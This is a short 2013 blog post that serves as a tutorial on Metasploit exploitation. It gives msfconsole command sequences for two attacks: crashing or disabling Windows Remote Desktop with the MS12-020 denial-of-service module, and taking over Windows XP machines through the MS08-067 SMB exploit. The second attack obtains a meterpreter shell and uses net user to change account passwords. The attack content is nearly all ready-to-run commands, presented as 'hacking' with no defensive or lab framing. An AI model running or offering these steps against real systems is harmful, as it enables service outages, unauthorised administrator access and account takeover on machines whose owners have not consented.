Thursday, July 18, 2013

Metasploit Usage for Exploitation

This tutorial is very general and I will continue updating it whenever I will find exploits and time to update this post.

1. If 3389/tcp  ms-term-serv is open then using metasploit you can cause remote machine to reboot or stop this service.

$ msfconsole 
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf  auxiliary(ms12_020_maxchannelids) > exploit

Now rescan target computer, you will find that the ms-term-serv service is disabled.

2. Hacking Windows XP SP2/SP3 and get administrator access of the system. (Following exploit attacks on port 445)

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell

C:\Windows\System32\> net user
C:\Windows\System32\>  net user  userName password

No comments:

Post a Comment